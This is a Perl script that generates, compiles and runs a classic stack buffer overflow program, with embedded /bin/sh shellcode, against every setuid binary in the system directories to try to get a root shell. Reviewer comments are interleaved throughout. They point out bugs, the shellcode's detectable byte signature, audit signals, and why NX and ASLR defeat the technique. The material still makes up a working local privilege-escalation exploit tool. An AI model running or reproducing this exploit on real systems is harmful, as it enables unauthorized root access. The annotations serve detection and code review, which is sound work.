#!/usr/bin/perl
# Probes each suid binary against a standard
# buffer overflow program (both with and without
# the use of environment variables).
# by bansh33 [www.r00tabega.com]
# some code taken from various overflows by v9 [www.fakehalo.org]
# by default, this runs offsets from -1000 to 1000 in 100's.
# I wrote this recently and have found it *incredibly* useful
# to quickly check any weak binaries.
$offset = 700; #read comments below for looping offsets further down
# NOTE(review): no `use strict; use warnings;` anywhere in this script, so every
# variable below is a package global and typos (see `j-1` further down) go unnoticed.
system("clear");
print "Generating basic buffer overflow..";
# Writes the helper program bof1.c into the current working directory.
# 2-arg open on a bareword handle with no error check: if the open fails
# (read-only cwd, existing directory named bof1.c, ...) nothing is reported
# and every print below goes nowhere.
open(writecode, ">bof1.c");
print writecode "/\*	usage: ./bof1 [offset] [path] [progname]\n";
print writecode "	this code written mostly by v9 \*/\n";
print writecode <<EOF;
#define DEFAULT_OFFSET 150
static char exec[]=
EOF
# The C array `exec` holds the machine-code payload; its last bytes spell
# "/bin/sh" (\x2f\x62\x69\x6e\x2f\x73\x68).  That fixed byte sequence, present
# in both bof1.c and the compiled bof1, is a straightforward signature for
# host-based file scanning.
print writecode "\"\\xeb\\x24\\x5e\\x8d\\x1e\\x89\\x5e\\x0b\\x33\\xd2\\x89\\x56\\x07\\x89\\x56\\x0f\\xb8\\x1b\\x56\"\n";
print writecode "\"\\x34\\x12\\x35\\x10\\x56\\x34\\x12\\x8d\\x4e\\x0b\\x8b\\xd1\\xcd\\x80\\x33\\xc0\\x40\\xcd\\x80\"\n";
print writecode "\"\\xe8\\xd7\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x01\"\;\n"; # v9 likes hex01 ;)
# The C driver below: ret = esp() - offset, fill a 241-byte buffer with that
# address, overwrite the front with 0x90 filler, append the payload, export
# the buffer as HOME and also pass it as argv[1] when exec'ing argv[2] (the
# target path) with argv[3] as its argv[0].  Both the environment and the
# argument vector are therefore probed in a single run.  On hosts with a
# non-executable stack, ASLR or stack protectors this technique does not
# succeed; what remains observable is a setuid program being exec'd with an
# oversized HOME value and argv[1], which is the event a process/exec audit
# rule would catch.  Note also that `exec` shadows the libc name and the
# driver includes no headers (relies on implicit declarations).
print writecode <<EOM;
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
 char bof[241];
 int i,offset;
 long ret;
 if(argc>1){offset=atoi(argv[1]);}
 else{offset=DEFAULT_OFFSET;}
 ret=(esp()-offset);
 printf("return address: 0x%lx, offset: %d.\n",ret,offset);
 for(i=1;i<241;i+=4){*(long *)&bof[i]=ret;}
 for(i=0;i<(237-strlen(exec));i++){*(bof+i)=0x90;}
 memcpy(bof+i,exec,strlen(exec));
 setenv("HOME", bof, 1);	
 execlp(argv[2], argv[3], bof, 0);
}
EOM
# close() on a write handle is where buffered write errors surface; its return
# value is ignored here.
close(writecode);
print ".. done.\n";
print "Compiling overflow..";
# gcc's exit status is ignored: if compilation fails (no compiler, 64-bit host
# rejecting the 32-bit inline asm, ...) the loop below still runs and every
# `./bof1` invocation simply fails.  A gcc run from an interactive shell on a
# box that normally has no build toolchain is itself a useful audit signal.
system("gcc -o bof1 bof1.c");
print ".. the overflow should now be compiled.\n";
# build list of suid (4755) binaries in /usr/bin, /usr/sbin, /bin, and /sbin.
# `-perm 4755` is an exact-mode match, so only files whose mode is precisely
# 4755 are listed.  Errors from find (unreadable dirs) go to the terminal,
# not into @suid.
print "Finding suid binaries..";
@suid = `find /usr/bin /usr/sbin /bin /sbin -perm 4755`;
print ".. found.\nStarting tests...\n\n";
foreach $path (@suid) {
chomp($path);
# Split the path on '/' to recover the basename for argv[0] of the target.
@binary = split(/\//, $path);
$j = 0;
# Counts @binary by hand; `scalar @binary` is the same value.  $j is then
# never actually used — see the next line.
foreach $test (@binary) { $j++; }
# NOTE(review): `j` here is a bareword, not `$j`.  Without strict it is the
# string "j", which numifies to 0, so the index is -1 — the last element,
# i.e. the basename.  Correct result, reached by accident.
$progname = $binary[j-1];
print "Testing $path...\n";
# Here is a simple loop offset routine, commented out by default:
# for ($offset = -1000; $offset < 1000; $offset=+100) {
# print logfile "Output at offset $offset\:\n";
# system("./bof1 $offset $path $progname");
#} 
# Be warned, looping offsets does so for EVERY suid binary
# and can take a VERY long time. Unless you really need to,
# it is recommended to use pre-set offsets.
# Single-string system() goes through /bin/sh, so $path and $progname (taken
# from find's output) are shell-interpreted: a filename containing spaces or
# metacharacters is split or expanded rather than passed as one argument.
# Each run exec's a setuid binary with an oversized HOME and argv[1]; the
# exit status is not inspected, so "success" is only visible on the terminal.
system("./bof1 $offset $path $progname");
}
print "Finished... cleaning up..\n";
# Cleanup is disabled: bof1 and bof1.c stay in the working directory after
# the run, which is where an on-disk scan for the payload bytes above would
# find them.
#system("rm -f bof1 bof1.c");
print "done.\n";
